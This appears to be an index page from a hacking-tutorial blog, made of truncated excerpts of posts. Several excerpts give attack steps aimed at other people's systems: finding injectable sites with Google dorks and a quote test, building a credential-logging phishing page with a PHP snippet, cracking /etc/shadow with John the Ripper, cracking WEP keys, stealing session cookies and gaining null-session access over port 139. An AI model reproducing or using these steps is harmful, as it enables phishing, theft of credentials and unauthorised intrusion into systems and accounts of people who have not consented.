Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when a h4cker was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some advanced attacks and propagate it down , he ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride. Installing Fast-Track: mak...

Sql Injection tutorial advanced. So far in all the hacks the most used by h4ck3rs from n00b to an 1337 one has been the SQL injection attack. Here we at hackiteasy we present a tutorial on how to apply SQL injection to websites. This trick has been found to be working on a huge no. of sites. The hack starts as follows. Finding vulnerable site To find a vunerable site open google Type in a dork like "inurl:index.php?id=" (without quotes) there are many other similar formats for finding such vulnerable pages. Now click on any site like http://www.yoursite.com/index.php?id=786 Now to test if the siote is hackable or not add a ' at the end of the site. If the site gives an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'84' at line 1" we can assume that it is vunerable. If not try some other site. We have the vulnerable site now. So lets try with differe...

Phishing has become a very easy to use trick to hack usernames and passwords of users. Here demonstrate how to create a fake phishing page for almost any social networking site , email or any other site that has a login form. For this trick you would need a hosting account , you can get that easily. Register yourself at t35, host1free, 110mb etc. Note- 110mb checks for phishing page on their site and removes them. So now u have a hosting account so lets create a fake page- First go to the target site. In your browser select Save As from the File menu and save the site on  your hardisk with name "login.htm" . or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm". Now the second part of the hack- Go to Notepad and copy this into it- <?php header ('Location: http://www.facebook.com'); $handle = fopen("log.txt", "a"); foreach($_POST as...

John the ripper is undoubtedly one of the best password cracking tool. People have been experiencing some problems with installing it. So here we bring out a tutorial on how to install the famous password cracker on a Linux machine. This is the method to install and use john the ripper in fedora/ubuntu (and many other linux as well).. 1) Download john the ripper software http://www.ziddu.com/download/6365223/jo...ar.gz.html 2) Extract it and then copy the text from http://www.openwall.com/lists/john-users/2009/09/02/3 3) Save the copy text in john folder with john.patch. 4) Open terminal and go to john folder cd Desktop/john-1.7.3.1 5) Now we have to patch our john software with following command patch -Np1 -i john.patch 6) go to src folder cd src 7) run this command make linux-x86-sse2 8) cd .. and goto run folder cd run. 9) Run this commmand ./unshadow /etc/passwd /etc/shadow > filename 10) Finally run this command to crack password ./john filename and here you have the ripper run...

Installing nessus on an Ubuntu or any other Linux machine can be a difficult task. So here we bring out a tutorial to ease you out to simplify the task of installing Nessus server. Here we have shown the installation on Ubuntu machine this could be used on nay other debian of linux as well. The totorial starts here- Download Nessus Nessus-4.0.1-ubuntu810_amd64.deb for Ubuntu 9.04 from http://www.nessus.org. dpkg -i Nessus-4.0.1-ubuntu810_amd64.deb Selecting previously deselected package nessus. (Reading database … 128086 files and directories currently installed.) Unpacking nessus (from Nessus-4.0.1-ubuntu810_amd64.deb) … Setting up nessus (4.0.1) … nessusd (Nessus) 4.0.1. for Linux (C) 1998 – 2009 Tenable Network Security, Inc. – Please run /opt/nessus/sbin/nessus-adduser to add a user – Register your Nessus scanner at http://www.nessus.org/register/ to obtain all the newest plugins – You can start nessusd by typing /etc/init.d/nessusd start root@testserver:~# /opt/nessus/sbin/nessus-...

We(hackiteasy.com) present another list of the must hacking tools every hacker must have. These toolsmake the life of a hacker much easier and every n00b must first learn how to use these tools first. AIRCRACK Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks. Site URL: http://www.aircrack-ng.org/ BackTrack BackTrack is a A Linux Distribution focused on penetration testing. Site URL: http://www.bactrack-linux.org BarsWF BarsWF is the worlds fastest md5 bruteforcing password cracker, just in case you didn't already know. It combines using your computers processor with you graphics cards GPU for computing the largest amount of hashes as quickly...

In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft). Here we show how you can hack a session using javascript and php. What is a cookie? A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server. A cookie has a expiration time that is set by t...

A web site can easily be hacked if you know the hack the admin of the website. So for that you need to know the admin page of the website. And that could be a headache sometimes. So here is a page made by a hacker that works for you and searches the site for the admin page. http://sc0rpion.ir/af/ Just go to the site and enter the url of the site or blog followed by a  "/" and it would search for all those pages it thinks to be admin pages. Quite simple. How it works- The site has a huge list of commonly occurring admin pages common on the web. So the site just adds those one by one and tests whether and page by that name exists or not. If there is any admin page it would show up.

The best password crackers. The list made from all password brealkers from all over the globe including versions from unix and widnows as well. 1. Cain and Abel : The top password recovery tool for Windows UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols 2. John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting diff...

Easily Hack A Windows password.. Click Here! Here we hack a PC somwhere in our LAN. This is a simple trick that uses open port to gain access to the target computer.The Lan hacking technique uses port 139 for the hack. On a LAN mostly the port 139 would remain open. Today,I will write about hacking computer inside the LAN network. This technique will be taking advantage of Port 139. Most of the time,Port 139 will be opened. First of all,I will do a port scanning at the target computer which is 192.168.40.128. This computer is inside my LAN network. I will scan it using Nmap. I get the result and it shows Port 139 is opened up for me. Now you will need both of these tools: ** USER2SID & SID2USER ** NetBios Auditing Tool You can get both of them on the Internet. After you get both of them,put them in the C:\ directory. Easily Hack A Windows password.. Click Here!     You now need to create a null session to the target computer. Now open the Command Prompt and browse to the ...

Ever tried dowloading those drivers(madwifi), or installing so many software on a linux for wireless testing and penetration. Now you won't have to sweat it out. Wifi Slax 's team does it for you. WifiSlax is a type of Slax OS made exclusively for wireless hacking. It comes with a bunch of wireless tools preloaded into it. These include Aircrack, Airsnort, kismet, madwifi drivers and many more... When we tried using one of those we came to know that the distro is made in spain and thus all of its content was in Spanish but to no worries we translated that and the language of Linux is same all over so it proved to be no big problem. Know more about Slax linux . Get wifi slax here- wifislax.com Google translated to english version Download page- http://www.wifislax.com/descargas.php

WEP key can easily be cracked with a simple combination of tools on Linux machine. The WEP cracking is made easier by the flaws in the design of the WEP encryption that makes it so vulnerable. These tools are already inbuilt in the Backtrack linux about which I posted recently. But you can install these hacking tools separately as well on any linux distro. These steps are made for an Ubuntu machine and uses Debian version which is the format for Ubuntu. Specific version for each each hack tool are available for almost all leading linux versions. The hack starts- Install aircrack-ng – on Debian Etch by: sudo apt-get install aircrack-ng Then start aircrack-ng to look for wireless networks: sudo airodump-ng eth1 Then notice the channel number of the wireless network you want to crack. Quit aircrack-ng and start it again with med specific channel number to collect packages faster: sudo airodump-ng -c 4 -w dump eth1 Then wait and let it collect about 500K IVS and the try the do the act...

Linux is obviously te best tool to try your hacking skills, as it is robust, made by hackers, gives you all tools for free and let you do what you want to do with it.To start your hacking stuff you need to get a lot of tools and you might be stuck when some tool starts creating error and you wish that your system had all these prehandedly. Here Backtrack comes in the scenario. Backtrack linux is just what every hacker dreams of, a full system preloaded with every tool you would have ever wished for. It haws almost every tool ever invented for hackers to lay there hands on. BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, a...

Wireless Hacking with backtrack 3 is easy to do , in this article I’d like to guide you in Wireless hacking with backtrack 3. This tutorial is made based on some requests by my subscribers , they’ve been familiar enough with Backtrack 3 , that’s why I made this Wireless Hacking with backtrack 3 tutorial. In order to start the wireless hacking , you need to make sure that you have met these requirements :   - Backtrack 3 or newer release - 1 wireless router - Laptop with wireless card And let the hack begins : In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, aor connecting to the AP. **********************************************************************...